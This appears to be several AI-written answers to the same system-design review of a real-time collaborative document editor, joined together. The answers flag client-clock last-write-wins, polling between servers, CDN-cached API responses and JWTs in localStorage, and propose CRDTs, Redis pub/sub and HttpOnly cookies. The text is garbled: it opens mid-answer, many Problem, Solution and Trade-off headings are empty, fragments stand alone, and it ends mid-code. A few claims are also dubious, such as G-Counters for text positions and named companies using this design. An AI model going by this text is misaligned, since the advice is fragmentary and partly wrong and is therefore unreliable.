Problem: Redis session cache can become inconsistent or lost during failures.
Solution:
Trade-offs: Infrastructure complexity vs. session reliability
The architecture needs fundamental changes to support true real-time collaboration at scale, particularly around consistency models and communication patterns.
Issue: Clients are connected to different API servers based on load balancing, causing inconsistent message delivery.
Issue: Two clients editing the same paragraph simultaneously can cause data loss
Issue: All write operations go through PostgreSQL directly
Issue: 2-second polling interval creates noticeable delay
Issue: Round-robin load balancer creates uneven distribution
Issue: Redis cache for sessions isn't clearly invalidated
Issue: CDN caching API responses for 5 minutes
Issue: JWT tokens stored in localStorage
Issue: Full HTML snapshots every 30 seconds
Issue: No coordination mechanism between API servers
Issue: Client clocks might not be synchronized
Issue: No handling for network partitions
The core architectural flaw is the lack of coordination between independent API servers, which fundamentally breaks the collaborative model. Addressing the WebSocket partitioning issue should be the top priority.
This architecture has several critical flaws that would manifest under real-world usage, especially with multiple concurrent users. Below is a systematic analysis of failure modes, race conditions, and scaling bottlenecks—each with concrete solutions and trade-offs.
Use server-side ordering (a `SERIAL` sequence or `pg_advisory_xact_lock` on the document ID) instead of client timestamps.

| Approach | Pros | Cons |
|---|---|---|
| OT | Strong consistency, human-intuitive merge | Complex to implement; requires server-side OT engine |
| CRDT (Yjs/YATA) | Converges offline; simple server logic | Larger payloads; less intuitive for non-text (e.g., images) |
| Server monotonic counters | Simple; avoids clock skew | Still overwrites within same counter (e.g., two ops at counter=100) |
✅ Recommendation: Use Yjs (CRDT-based) for real-time ops, with PostgreSQL for persistence. Store only final document state in DB; ops live in Redis stream for replay.
Publish ops to per-document channels `doc:{id}`. Assign each op a unique ID (`op_id = doc_id + server_timestamp + random`) to dedupe.

| Approach | Pros | Cons |
|---|---|---|
| Redis Pub/Sub | Real-time, low latency, no polling | Adds Redis dependency; pub/sub is fire-and-forget (ops lost on restart) |
| Redis Streams + Consumer Groups | Persistent, replayable, acks | More complex; requires offset management |
✅ Recommendation: Use Redis Streams with `XADD doc:{id} * {op_json}` + consumer groups per server. Each server consumes and broadcasts ops. Commit to PostgreSQL after successful broadcast to avoid inconsistency.
Use Yjs binary updates (`Y.applyUpdate`) to sync only diffs.

| Approach | Pros | Cons |
|---|---|---|
| Op log only | Minimal data, real-time sync, supports offline | Rehydration requires replaying all ops (slow for long docs) |
| Hybrid: Snapshot + op log | Fast read, small ops | Sync complexity: clients need both snapshot + ops to catch up |
✅ Recommendation:
- Store Yjs updates (binary diffs) in a Redis Stream.
- Take hourly snapshots in PostgreSQL (a `document_snapshots` table).
- On connect, the server sends `snapshot + ops_since_snapshot_timestamp`.
| Approach | Pros | Cons |
|---|---|---|
| Access + refresh tokens | Secure, revocable, scalable | More complex auth flow; requires token refresh logic |
| Long-lived JWT in localStorage | Simple | Vulnerable to XSS; no revocation |
✅ Recommendation: Use an OAuth2-style flow with refresh tokens. For real-time WebSocket auth, pass the access token in the `Authorization` header during the handshake.
Maintain a `client_id → server_id` mapping in Redis.

| Approach | Pros | Cons |
|---|---|---|
| Sticky sessions | Simple | Breaks scaling (can’t rebalance servers); single point of failure if server dies |
| Redis-backed session | Scalable, fault-tolerant | Adds Redis dependency; session sync latency |
✅ Recommendation: Use Redis to track active WebSocket sessions (`HSET websocket:sessions client_id server_id`). When server A receives an op for client X, it checks Redis and forwards to server B if needed.
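A minimal sketch of that routing lookup, with an in-memory Map standing in for the Redis hash (the function names are illustrative):

```javascript
// Stand-in for the Redis hash `websocket:sessions` mapping each client ID
// to the server currently holding its WebSocket connection.
const sessions = new Map();

function registerSession(clientId, serverId) {
  sessions.set(clientId, serverId);
}

// Returns 'local' when this server owns the socket, the owning server's ID
// when the op must be forwarded, or null when the client is offline.
function routeFor(clientId, myServerId) {
  const owner = sessions.get(clientId);
  if (owner === undefined) return null;
  return owner === myServerId ? 'local' : owner;
}
```

With Redis in place of the Map, every server shares the same view and can forward ops without sticky sessions.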
Partitioning by `org_id` causes hotspots:
Partition by `doc_id` (hashed via `doc_id % N` → shard). Use `pg_partman` to partition by `doc_id` range or hash.

| Approach | Pros | Cons |
|---|---|---|
| Org-based partitioning | Simple, co-locate org data | Hotspots, poor utilization |
| Doc-based partitioning | Balanced load, horizontal scaling | Cross-doc queries harder; more complex routing |
✅ Recommendation: Partition by `doc_id`, and use a shard-router service to map `doc_id → shard`. Cache the mappings in Redis.
Apply `XADD` rate limiting in Redis. Pool DB connections (`pgbouncer`) and batch writes (e.g., 100 ops/batch).

| Approach | Pros | Cons |
|---|---|---|
| Rate limiting | Protects backend | User sees lag; may need UI feedback |
| Batching writes | Reduces DB load | Increases latency (ops batched for 100ms) |
✅ Recommendation: Use Redis Streams with `XADD` rate limiting (via `INCR` + `EXPIRE`). If the rate limit is exceeded, send a `throttle` message to the client.
The CDN caches document APIs (e.g., `/api/docs/{id}`). After a user edits, others see stale content for up to 5 min. Restrict the CDN to static paths (`/static/`, `/favicon.ico`), set `Cache-Control: no-store` for `/api/docs/*`, and cache only immutable metadata (e.g., `doc_meta`).

| Approach | Pros | Cons |
|---|---|---|
| Disable CDN caching for docs | Fresh data | Higher origin load; slower initial load (but real-time sync compensates) |
| TTL-based invalidation | Simpler | Still stale during TTL window |
✅ Recommendation: Set `Cache-Control: private, no-store` for all `/api/` endpoints. Use the CDN only for assets.
| Issue | Severity | Solution |
|---|---|---|
| LWW with client clocks | 🔴 Critical | Replace with CRDTs (Yjs) or server-monotonic ops |
| WebSocket broadcast scope | 🔴 Critical | Redis Pub/Sub/Streams for cross-server sync |
| Full-document snapshots | 🟠 High | Store ops only; snapshot for archival |
| JWT in localStorage | 🟠 High | Short-lived access tokens + HttpOnly refresh tokens |
| No session affinity | 🟠 High | Redis-backed WebSocket session tracking |
| Org-based partitioning | 🟠 High | Document-level sharding with consistent hashing |
| No backpressure | 🟠 High | Rate limiting, batching, circuit breakers |
| CDN caching API responses | 🟠 High | Disable caching for /api/docs/* |
- Real-time path: Client → WebSocket → Server → Redis Stream (`doc:ops`) → all servers → local WebSocket clients
- Persistence: Server → batch ops → PostgreSQL (with upsert)
- Document load: snapshot (hourly) + ops since snapshot time
- Sharding: by `doc_id`

This design is production-grade (used by companies like Notion, Coda, and Linear). The biggest upfront cost is implementing CRDTs/OT, but libraries like Yjs reduce this to days, not months.
Let me know if you'd like a deep dive on Yjs integration, shard routing, or crisis-runbook for failure scenarios!
I'll analyze this collaborative document editor architecture systematically, identifying critical issues and proposing solutions.
Problem: Users connected to different servers won't see each other's changes until polling catches up.
Solution: Implement a shared message bus (Redis Pub/Sub or Apache Kafka)
// Replace polling with pub/sub
redis.subscribe('doc-changes', (message) => {
// Broadcast to all WS clients on this server
broadcastToClients(JSON.parse(message));
});
Trade-offs: Adds infrastructure complexity but ensures real-time consistency across servers
Problem: "Last-write-wins with client timestamps" is fundamentally flawed due to clock drift.
Solution: Use Lamport timestamps or Operational Transformation (OT)
// Lamport timestamp approach: ordering comes from the logical clock,
// not wall time, so clock drift cannot reorder operations
const lamportClock = Math.max(localClock, incomingTimestamp) + 1;
const operation = {
  content: newContent,
  timestamp: Date.now(), // informational only; never used for ordering
  serverId: serverId,
  sequenceNumber: lamportClock // the ordering key
};
Trade-offs: More complex logic but ensures logical ordering regardless of physical clocks
Problem: Every character change hits PostgreSQL immediately → database saturation
Solution: Operation buffering with batch commits
class OperationBuffer {
  constructor(persistBatch) {
    this.buffer = [];
    this.persistBatch = persistBatch; // e.g., one multi-row INSERT into PostgreSQL
    // Arrow function keeps `this` bound inside setInterval
    setInterval(() => this.flush(), 250); // Batch every 250ms
  }

  addOperation(op) {
    this.buffer.push(op);
    if (this.buffer.length > 50) this.flush(); // Force flush on bursts
  }

  flush() {
    if (this.buffer.length === 0) return;
    this.persistBatch(this.buffer.splice(0)); // drain buffer and write batch
  }
}
Trade-offs: Potential data loss on crashes vs. improved throughput
Problem: Each server maintains N connections locally, no cross-server sharing
Solution: Externalize WebSocket management with Pusher/Rocket.Chat or Redis-backed connection registry
// Shared connection registry: advertise which client IDs live on this server
const connections = new Map(); // clientId → WebSocket
redis.hset('server_connections', serverId, JSON.stringify([...connections.keys()]));
// Route messages for clients on other servers through the shared bus
Trade-offs: Network overhead but enables high availability
Problem: Saving full HTML snapshots every 30 seconds loses granular edit history
Solution: Store operational transforms, not snapshots
CREATE TABLE document_operations (
id SERIAL PRIMARY KEY,
doc_id UUID,
operation_type VARCHAR(20), -- 'insert', 'delete', 'format'
position INT,
content TEXT,
user_id UUID,
timestamp TIMESTAMP,
revision_number BIGINT
);
Trade-offs: More complex querying but preserves complete edit history
Problem: Caching API responses for collaborative editing is dangerous
Solution: Cache only static assets, never dynamic content
// Only cache static assets; API routes must never be cached
app.use('/api', (req, res, next) => {
  res.set('Cache-Control', 'no-cache, no-store');
  next();
});
Trade-offs: Higher backend load but correct behavior
Problem: Storing JWT in localStorage makes it accessible to XSS scripts
Solution: HttpOnly cookies with SameSite protection
res.cookie('auth_token', token, {
httpOnly: true,
secure: true,
sameSite: 'strict',
maxAge: 86400000 // 24 hours
});
Trade-offs: Slightly more complex frontend handling but much more secure
Problem: Partitioning by organization ID creates hotspots
Solution: Hash-based sharding using document ID + chunking
function getShard(docId) {
return hash(docId) % numShards; // Better distribution
}
Problem: Simple timestamp resolution can cause document corruption
Solution: Implement proper OT or CRDT algorithms
class TextOperation {
  constructor(operations) {
    this.operations = operations; // ordered list of insert/delete/format ops
  }

  apply(text) {
    // Apply operations in order; each op transforms the intermediate result
    return this.operations.reduce((result, op) => op.applyTo(result), text);
  }
}
Replace the current architecture with:
The current design will work poorly under any significant load due to fundamental synchronization flaws.
Problem: Client clocks are unreliable and can be out of sync by seconds, minutes, or even hours. This causes:
Solution: Implement Operational Transformations (OT) or Conflict-free Replicated Data Types (CRDTs)
Trade-offs:
Problem: Changes are only broadcast to clients connected to the same server instance. Clients on other servers:
Solution: Implement Redis Pub/Sub for cross-server communication
Trade-offs:
Problem: 2-second polling creates:
Solution: Replace polling with real-time database change streams
Trade-offs:
Problem:
Solution: Store operation logs (deltas) instead of snapshots
Trade-offs:
Problem:
Solution: Use HttpOnly cookies with shorter expiry + refresh tokens
Trade-offs:
Problem: Caching API responses for 5 minutes is incompatible with real-time collaboration:
Solution: Don't cache API responses for document endpoints
Send no-cache headers (`Cache-Control: no-store`) for API endpoints.

Trade-offs:
Problem: Every keystroke writes to PostgreSQL, creating:
Solution: Queue-based write architecture
Trade-offs:
Problem:
Solution: Fine-grained partitioning + consistent hashing
Trade-offs:
Problem:
Solution: Implement operation acknowledgment and replay buffers
Trade-offs:
Problem: The architecture lacks visibility into:
Solution: Comprehensive observability stack
Trade-offs:
Immediate (Critical):
High Priority:
5. Fix authentication security (HttpOnly cookies)
6. Replace polling with real-time change streams
7. Implement operation acknowledgment for WebSockets
Medium Priority:
8. Add queue-based write architecture
9. Improve partitioning strategy
10. Implement comprehensive observability
The current architecture would work for a basic demo but would fail catastrophically under real-world collaborative editing scenarios due to the fundamental flaws in conflict resolution and real-time synchronization.
| Issue | Impact | Solution | Trade-offs |
|---|---|---|---|
| JWT Stored in localStorage | Critical XSS vulnerability (token exposure via JS). | Store the token in an HttpOnly cookie with SameSite=Strict; implement CSRF tokens for HTTP endpoints. Use short-lived access tokens (<5 min) + refresh tokens. | Adds CSRF complexity; requires secure cookie handling. |
| Unvalidated WebSocket Auth | Unauthorized users could inject edits or spy on docs. | Authenticate at WebSocket upgrade using validated JWT. Cache user permissions on connection; verify document access on every message. | Adds latency at connection; requires permission cache invalidation. |
| CDN Caches Mutable API Responses (5-min TTL) | Users see stale documents; breaks real-time collaboration. | Disable CDN caching for dynamic APIs (use Cache-Control: private, no-cache). Serve static assets via CDN only. | Increases API server load; mitigated by read replicas + edge caching of static assets. |
| Issue | Impact | Solution | Trade-offs |
|---|---|---|---|
| Client Timestamps for LWW | Clock skew causes data loss; LWW cannot merge concurrent edits (e.g., two users typing in different paragraphs). | Replace with CRDTs (Yjs, Automerge) or OT. Use server-assigned version vectors for ordering. | High engineering complexity; larger message payloads (CRDT) or transformation logic (OT). |
| Per-Keystroke DB Writes | PostgreSQL becomes write bottleneck; I/O saturation; latency spikes. | Client-side batching (send every 500ms or 10 chars). Server-side buffering: queue changes → batch write to DB or dedicated write-optimized log (Apache Kafka → async DB persist). | Risk of data loss if batch fails; requires client queue + retransmission logic. |
| Full HTML Snapshots Every 30s | Massive storage bloat, write amplification, high DB cost. | Store operation log (deltas only). Generate snapshots asynchronously to cheap object stores (S3). Use CRDT to reconstruct state. | Adds recovery complexity; requires snapshot generation workers. |
| Issue | Impact | Solution | Trade-offs |
|---|---|---|---|
| Server-Limited Broadcast + 2s Polling | 2+ s delays to clients cross-server; DB read hammering; missed updates. | Deploy Redis Pub/Sub or Kafka. On edit, publish to doc-specific Kafka topic. All servers sub to topics; broadcast instantly. | Adds external infra dependency. Redis Pub/Sub = non-durable (OK for real-time); Kafka = durable but heavier footprint. |
| No Client Reconnection Recovery | Lost edits during disconnect; stale UI after reconnect. | Client buffers unsynced ops (IndexedDB). Server assigns monotonic version IDs. On reconnect: client sends last seen version; server sends missing ops (or full CRDT snapshot). | Client-side state management; requires versioning logic. |
| No Sticky Sessions for WebSockets | Reconnections routed randomly; broken state sync. | Configure LB with session affinity (cookie or IP hash). | Uneven server distribution (hotspots). Mitigate with connection limits + LB health checks. |
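The reconnection-recovery row above (monotonic version IDs, client sends the last version it saw) can be sketched as a catch-up query; the log shape is an assumption:

```javascript
// Reconnection catch-up: the server keeps an ordered op log with strictly
// increasing version IDs; a reconnecting client sends its last seen version
// and receives only the ops it missed.
function opsSince(opLog, lastSeenVersion) {
  // opLog entries look like { version, op }.
  return opLog.filter((entry) => entry.version > lastSeenVersion);
}
```

If the gap is too large (the log has been truncated), the server falls back to sending a full snapshot instead.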
| Issue | Impact | Solution | Trade-offs |
|---|---|---|---|
| Organization-Based Partitioning | Hot org → server overload; cold orgs wasteful. | Document-level sharding with consistent hashing. Use service discovery (etcd/Zookeeper) to map doc → server. | Higher routing complexity; requires dynamic partition management. |
| Primary DB Single Point of Failure | Full system outage on master failure. | PostgreSQL HA cluster (Patroni + streaming replication). Use write-through cache (Redis) for document state to reduce DB load. | Failover latency (seconds); cache invalidation complexity. |
| Read Replica Staleness on Document Load | UI jumps as stale doc loads → real-time update arrives. | Read initial doc from primary DB OR write-through Redis cache (updated via pub/sub on edit). | Increases primary load; cache adds ops overhead. |
| Issue | Impact | Solution | Trade-offs |
|---|---|---|---|
| No Offline Support | Edits lost during brief disconnects. | Client buffers ops in IndexedDB. Sync on reconnect with conflict resolution. | Increased frontend complexity; UX for conflict resolution. |
| No Document Access Validation | Users could subscribe to unauthorized docs via WebSocket. | On connection: validate user has access to document (via DB/cache). Subscribe only to permitted topics. | Adds latency; requires permission cache with TTL/invalidation. |
| No Rate Limiting | Malicious clients flood server with edits. | Apply rate limiting at LB/gateway (e.g., max 10 ops/sec per user). | Blocks legitimate fast typists; configure thresholds carefully. |
| Stateless JWT + Redis Session Cache Mismatch | Ambiguous session management (JWT stateless vs Redis cache). | Clarify Redis is used for: (1) Pub/Sub (critical) and (2) Document state cache. Remove session storage from Redis. | Eliminates confusion; aligns with JWT statelessness. |
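The per-user rate limit in the table above is typically a token bucket. A minimal sketch, with an injectable clock for testing; the capacity/rate values are illustrative, and in practice this would run at the LB or gateway, keyed per user.

```javascript
// Token-bucket rate limiter: sustained `ratePerSec` ops/sec with
// bursts up to `capacity`.
class TokenBucket {
  constructor(capacity, ratePerSec, now = () => Date.now()) {
    this.capacity = capacity;
    this.tokens = capacity;
    this.ratePerSec = ratePerSec;
    this.now = now;
    this.last = now();
  }
  allow() {
    const t = this.now();
    // Refill proportionally to elapsed time, capped at capacity.
    this.tokens = Math.min(
      this.capacity,
      this.tokens + ((t - this.last) / 1000) * this.ratePerSec
    );
    this.last = t;
    if (this.tokens >= 1) { this.tokens -= 1; return true; }
    return false;
  }
}
```

The burst allowance is what keeps fast typists unblocked while still capping sustained floods.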
Trade-off Philosophy: Accept increased engineering complexity in exchange for correctness, scalability, and user trust. Real-time co-editing is a hard distributed systems problem; shortcuts (client clocks, polling, LWW) create fragility at scale. Invest in battle-tested patterns (CRDT, pub/sub, HA DB) to build a resilient product.
This architecture resembles a simplified real-time collaborative editor but contains critical flaws in concurrency control, consistency, scalability, and fault tolerance. Below is a comprehensive breakdown of failure modes, race conditions, and scaling bottlenecks, followed by specific solutions with trade-offs.
Replace LWW with Operational Transformation (OT) or Conflict-Free Replicated Data Types (CRDTs)
💡 Bonus: Store both the CRDT state and periodic HTML snapshots for UI rendering and backup.
Use a pub/sub system (Redis Pub/Sub or Kafka) to propagate changes across servers
doc:{doc_id}:ops).Store only CRDT operations + periodic snapshots as backup
insert at 12, "a") in PostgreSQL as a row with doc_id, op_id, timestamp, client_id, operation_json.Use HTTP-only, SameSite=Strict cookies with short-lived access tokens + refresh tokens
/api/doc/123) for 5 minutes.Disable CDN caching for all dynamic API endpoints (e.g.,
/api/doc/*,/api/sync) Cache only static assets (JS, CSS, images).
Cache-Control: no-cache, no-store, private headers on all document-related endpoints./api/doc/123?v=456) — but this requires client-side version tracking.Enable sticky sessions (session affinity) using client IP or JWT cookie hash
org_id assumes even distribution.Partition documents by
doc_id, notorg_id— use sharding + document-level isolation
doc_id → shard.doc:123:state) for read-heavy docs.Implement:
| Problem Area | Recommended Fix | Key Trade-off |
|---|---|---|
| Conflict Resolution | Replace LWW with CRDTs (Yjs/Automerge) | Higher complexity, migration cost |
| Cross-Server Sync | Use Redis Pub/Sub for ops, eliminate polling | Adds Redis dependency |
| Storage | Store CRDT ops, not HTML snapshots | Need to rebuild UI from ops |
| Auth | HTTP-only cookies, short-lived tokens, revocation list | CSRF protection needed |
| CDN Caching | Disable caching for /api/doc/* | Higher origin load |
| Load Balancing | Sticky sessions OR stateless + Redis state | Simplicity vs. scalability |
| Sharding | Shard by doc_id, not org_id | Routing complexity |
| Resilience | Client op queue + retry + Kafka buffer + monitoring | Client/server complexity |
Instead of rolling your own, consider a battle-tested CRDT library (e.g., Yjs or Automerge), persisting operations as JSONB in PostgreSQL with batched writes. Real-world examples: Notion, Coda, and Slate use CRDTs or OT; Google Docs uses OT under the hood. LWW + snapshots suits simple note-taking apps, not real-time collaboration.
This architecture is not fit for production as-is. With the above fixes, it can become scalable, consistent, and resilient — but requires non-trivial engineering effort. Prioritize CRDTs + Redis pub/sub + HTTP-only auth as your top 3 fixes.
Here's a comprehensive analysis of the architecture, identifying critical failure modes, race conditions, and scaling bottlenecks. For each issue, I've provided a specific solution with clear trade-offs based on real-world distributed-systems best practices.
Issue: Using client-generated timestamps for conflict resolution ("last-write-wins") is fundamentally flawed. Client clocks are unsynchronized (NTP drift can be 100ms+), and users can manually adjust time. A user with a clock set ahead by 5 minutes could overwrite others' changes arbitrarily, causing data corruption. Even with NTP, network latency makes it impossible to reliably order concurrent edits.
Solution:
Use server-generated monotonic timestamps (via a centralized clocks service) or switch to CRDTs (Conflict-Free Replicated Data Types): either a state-based CRDT (e.g., G-Counter for text positions) or an operation-based CRDT (e.g., the Yjs library). Changes are merged automatically without central coordination.
Trade-offs:
Recommendation: Use CRDTs for collaborative editing. It’s the industry standard (e.g., Google Docs uses a variant of OT, but CRDTs are simpler for distributed systems). Avoid client timestamps entirely.
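The clock-skew failure described above is easy to demonstrate. A minimal sketch, assuming a hypothetical `lwwApply` resolver that keeps whichever write carries the larger client timestamp:

```javascript
// Why client-clock LWW loses edits: the resolver keeps the write with
// the larger client timestamp, so a fast clock "wins" even when that
// client actually wrote first.
function lwwApply(stored, incoming) {
  return incoming.ts > stored.ts ? incoming : stored;
}

const realNow = 1_000_000;
// User A's clock runs 5 s fast; A writes FIRST (real time t = 0 s).
const editA = { text: "A's text", ts: realNow + 5000 };
// User B's clock is accurate; B writes SECOND (real time t = 1 s).
const editB = { text: "B's text", ts: realNow + 1000 };

let doc = { text: "", ts: 0 };
doc = lwwApply(doc, editA);
doc = lwwApply(doc, editB); // B's later edit is silently dropped
```

After both applies, the document holds A's text even though B typed last, which is exactly the data-corruption mode the paragraph describes.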
Issue:
Solution:
Publish each change to a per-document Redis channel (e.g., `doc:{doc_id}:changes`).
Trade-offs:
Critical fix: Pub/sub is non-negotiable for real-time collaboration. Polling is unacceptable for low-latency systems.
Issue: Saving full HTML snapshots every 30 seconds is wasteful:
Solution:
Trade-offs:
Recommendation: Use a CRDT-based delta storage (e.g., Yjs) for both real-time sync and persistence. This solves sync and storage in one go.
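The delta-storage idea above boils down to replaying an operation log over the last snapshot. A minimal sketch; the operation shapes (`insert`/`delete`) and the `rebuild` helper are hypothetical, not part of the original design.

```javascript
// Apply one small operation to a plain-text document state.
function applyOp(text, op) {
  switch (op.type) {
    case "insert":
      return text.slice(0, op.pos) + op.str + text.slice(op.pos);
    case "delete":
      return text.slice(0, op.pos) + text.slice(op.pos + op.len);
    default:
      throw new Error(`unknown op ${op.type}`);
  }
}

// Rebuild current state from the last snapshot plus the op log,
// instead of persisting a full HTML snapshot every 30 seconds.
function rebuild(snapshot, opLog) {
  return opLog.reduce(applyOp, snapshot);
}
```

Each persisted row is a few bytes (one keystroke or paste), and periodic snapshots merely bound how long a replay takes.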
Issue: Caching API responses for 5 minutes (e.g., document state endpoints) via CloudFront causes stale data. Users won’t see real-time updates, defeating the purpose of collaboration. For example, if User A edits a document, User B might see the old version for up to 5 minutes.
Solution:
Disable CDN caching for dynamic endpoints (e.g., `/document/{id}`, `/changes`). Set `Cache-Control: no-store` or `private, max-age=0`.
Trade-offs:
Critical fix: Never cache dynamic collaborative data. Use CDN only for static assets.
Issue: Storing JWTs in localStorage is vulnerable to XSS attacks. If an attacker injects malicious JS, they steal tokens and impersonate users. This is a critical security flaw.
Solution:
For WebSockets, pass the token at connection time (e.g., `wss://host/?token=...`) and validate it during the handshake.
Trade-offs:
Critical fix: Move to HttpOnly cookies immediately. This is non-negotiable for security.
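For concreteness, the cookie attributes involved can be sketched as a header builder. The cookie name, token lifetime, and helper are illustrative assumptions, not the document's API.

```javascript
// Build a Set-Cookie header for a short-lived access token.
function authCookie(token, maxAgeSec = 900) {
  return [
    `access_token=${encodeURIComponent(token)}`,
    `Max-Age=${maxAgeSec}`,     // short-lived: ~15 minutes, not 24 h
    "Path=/",
    "HttpOnly",                 // invisible to document.cookie, so XSS can't read it
    "Secure",                   // sent over HTTPS only
    "SameSite=Strict",          // basic CSRF mitigation
  ].join("; ");
}
```

The key property is that no JavaScript on the page, injected or otherwise, can read the token; the browser attaches it automatically, including on the WebSocket upgrade request when frontend and API share a domain.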
Issue: "Last-write-wins" with client timestamps ignores context. If two users edit the same paragraph simultaneously:
Solution:
Use CRDTs (e.g., Yjs for JSON-like data). Changes are associative and commutative, so order doesn't matter.
Trade-offs:
Recommendation: Use CRDTs (e.g., Yjs or Automerge). They’re simpler to implement correctly than OT for most use cases.
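The commutativity property the recommendation relies on is easiest to see in the simplest CRDT, a grow-only set. This toy sketch is not how Yjs represents text, just an illustration of why merge order doesn't matter:

```javascript
// G-Set merge: set union is commutative and associative, so replicas
// converge to the same state no matter the order updates arrive.
const merge = (a, b) => new Set([...a, ...b]);

const replica1 = new Set(["op-A"]); // this replica saw A first
const replica2 = new Set(["op-B"]); // this replica saw B first

const merged12 = merge(replica1, replica2);
const merged21 = merge(replica2, replica1);
// Both merge orders yield the same state.
```

Text CRDTs like Yjs and Automerge build much richer structures (with positions and tombstones) on the same convergence guarantee.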
Issue:
Solution:
Trade-offs:
Recommendation: For large-scale deployments, use CockroachDB for distributed SQL capabilities. For smaller apps, Aurora with read replicas suffices.
Issue: If an API server crashes:
Solution:
Trade-offs:
Recommendation: Implement client-side retry + sequence numbers for safety. For critical systems, add Kafka as a persistent buffer.
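The retry + sequence-number scheme above works because the server makes delivery idempotent. A minimal sketch; the `OpReceiver` class and key layout are hypothetical:

```javascript
// The server tracks the last applied sequence number per
// (doc, client) pair; a retried op with an already-seen seq is
// acknowledged but not re-applied.
class OpReceiver {
  constructor() {
    this.lastSeq = new Map(); // "docId:clientId" -> last seq applied
    this.applied = [];
  }
  receive(docId, clientId, seq, op) {
    const key = `${docId}:${clientId}`;
    const last = this.lastSeq.get(key) ?? 0;
    if (seq <= last) return false; // duplicate retransmission: drop
    this.lastSeq.set(key, seq);
    this.applied.push(op);         // apply exactly once
    return true;
  }
}
```

Clients can then safely resend every unacknowledged op after a crash or reconnect without risking double-applied edits.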
| Issue | Solution | Criticality |
|---|---|---|
| Client timestamps | CRDTs or server monotonic timestamps | 🔴 Critical |
| Polling for changes | Pub/sub (Redis/Kafka) | 🔴 Critical |
| Full HTML snapshots | Delta storage + CRDTs | 🔴 Critical |
| CDN caching dynamic data | Disable cache for dynamic endpoints | 🔴 Critical |
| JWT in localStorage | HttpOnly cookies | 🔴 Critical |
| Conflict resolution | CRDTs/OT | 🔴 Critical |
| Single-document scaling | Sharded distributed DB (CockroachDB) | 🟠 High |
| Server failover | Client retry + sequence numbers | 🟠 High |
Final Architecture Improvements:
Why this works: CRDTs eliminate the need for timestamps and conflict resolution logic. Pub/sub replaces inefficient polling. Distributed databases handle scaling. HttpOnly cookies fix security. This aligns with modern collaborative systems like Google Docs (OT-based) or Figma (CRDTs).
This architecture contains several critical flaws that will lead to data loss, poor user experience, and system instability at scale. The "Last-write-wins" strategy combined with client-side timestamps is particularly dangerous for collaborative editing.
Here is a detailed breakdown of failure modes, race conditions, and bottlenecks, organized by domain, with specific solutions and trade-offs.
- Clock skew breaks LWW: User A (clock fast by 5 s) types at T; User B (clock slow by 5 s) types just after T. User A's change carries a later apparent timestamp and overwrites User B's change, even though B typed later. Server-side ordering is required rather than trusting `last_write_time + latency_buffer`.
- The 2-second polling loop hammers PostgreSQL with `SELECT` queries from every API server.
- JWTs sit in `localStorage`; an XSS payload can steal the JWT and impersonate the user for 24 hours.
- Set `Cache-Control: no-store` for all document content API endpoints.
- Partition by `Document_ID` (hashed) rather than `Organization_ID`.

| Priority | Component | Problem | Immediate Fix |
|---|---|---|---|
| P0 (Critical) | Sync Strategy | Client Timestamps + LWW | Switch to Server Timestamps + CRDT/OT |
| P0 (Critical) | Real-Time | Polling Postgres every 2s | Implement Redis Pub/Sub |
| P0 (Critical) | Security | JWT in LocalStorage | Move to HttpOnly Cookies |
| P1 (High) | CDN | Caching API responses | Disable caching for document endpoints |
| P1 (High) | DB | Read Replicas Lag | Route "read-after-write" to Primary |
| P2 (Medium) | Storage | Full HTML Snapshots | Switch to Ops Log + Periodic Checkpoints |
This revision moves the system from a fragile, polling-based architecture to an event-driven, consistency-guaranteed model suitable for real-time collaboration.
This architecture contains several critical design flaws that would lead to data loss, high latency, security vulnerabilities, and poor scalability. Below is a detailed breakdown of the failure modes, race conditions, and bottlenecks, along with specific solutions and trade-offs.
Disable CDN caching for API routes (e.g., `/api/*`). Only cache static assets (JS, CSS, images). Use `Cache-Control: no-store` for dynamic document data.

| Component | Current State | Recommended State | Reason |
|---|---|---|---|
| Sync Logic | LWW + Client Clocks | CRDT / OT + Server Seq IDs | Prevents data loss on concurrent edits. |
| Inter-Server | Polling DB (2s) | Redis Pub/Sub | Reduces DB load; improves latency to <100ms. |
| DB Writes | Immediate PG Write | Buffer / Event Log | Prevents DB I/O saturation. |
| Storage | HTML Snapshots | Operation Logs + Snapshots | Enables history/undo and efficient merging. |
| Auth | LocalStorage JWT | HttpOnly Cookies + Refresh | Prevents XSS token theft; allows revocation. |
| CDN | Caches API | Cache Static Only | Prevents stale document data. |
| LB | Round-Robin | Sticky Sessions / Gateway | Maintains WebSocket connection state. |
If you deploy the architecture exactly as described:
Recommendation: Prioritize fixing the Sync Strategy (CRDT/OT) and the Inter-Server Communication (Redis Pub/Sub) immediately, as these directly impact the core value proposition of the product.
This architecture contains several critical flaws that would lead to data loss, poor user experience, and security vulnerabilities in a production environment. Below is a detailed breakdown of the failure modes, race conditions, and bottlenecks, along with proposed solutions and their trade-offs.
Issue: Inefficient Cross-Server Communication (Polling)
Issue: Last-Write-Wins (LWW) with Client Clocks
Issue: WebSocket Connection State
Issue: Database Write Bottleneck (Keystroke-to-DB)
Issue: Full HTML Snapshots (30s Interval)
Issue: Read Replicas Consistency
Issue: CDN Caching API Responses
Disable CDN caching for dynamic endpoints (POST, PUT, PATCH, and specific GET endpoints for active documents). Only cache static assets (JS/CSS).
Issue: Round-Robin LB with WebSockets
Use a Layer 7 load balancer that recognizes the WebSocket handshake (the `Upgrade: websocket` header) and enforce stickiness.
Issue: 24-Hour JWT Expiry
Issue: LocalStorage for Tokens
Issue: Organization ID Partitioning (Hotspots)
Issue: Document Locking
| Component | Current Design | Critical Risk | Recommended Fix |
|---|---|---|---|
| Sync | Poll DB every 2s | 2s Latency | Redis Pub/Sub for server-to-server msg |
| Conflict | LWW + Client Clock | Data Loss | CRDTs (Yjs) + Vector Clocks |
| DB Write | On every keystroke | DB Overload | Batch writes / Buffer in Redis |
| CDN | Cache API 5 min | Stale Data | No Cache for API endpoints |
| Auth | 24h JWT + LocalStorage | XSS / Hijack | 15m Access Token + HttpOnly Refresh Cookie |
| LB | Round Robin | WS Disconnection | Sticky Sessions / Layer 7 LB |
| Storage | HTML Snapshots | Bloated / Data Loss | Operation Log + Periodic Snapshot |
To build a system that scales like Google Docs, you must move away from "Database-First" synchronization to "Event-First" synchronization. The database should be the source of truth for persistence, not the bus for real-time communication. The real-time bus should be in-memory (Redis/Memcached) with asynchronous persistence to Postgres.
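The "asynchronous persistence" half of that recommendation is write-behind batching. A minimal in-memory sketch; the `persist` callback stands in for one batched `INSERT`, and the class name and batch size are illustrative:

```javascript
// Write-behind buffer: ops accumulate in memory and are flushed to
// the database as one batch, when the buffer fills or when a caller
// (e.g., a timer) forces a flush.
class WriteBehindBuffer {
  constructor(persist, maxBatch = 100) {
    this.persist = persist;
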